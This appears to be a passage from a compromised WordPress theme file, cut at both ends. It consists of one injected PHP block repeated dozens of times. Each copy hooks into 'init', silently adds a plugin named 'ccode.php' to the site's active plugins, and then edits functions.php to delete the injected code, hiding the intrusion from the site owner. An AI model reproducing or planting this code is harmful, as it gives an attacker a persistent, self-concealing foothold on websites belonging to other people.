$new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 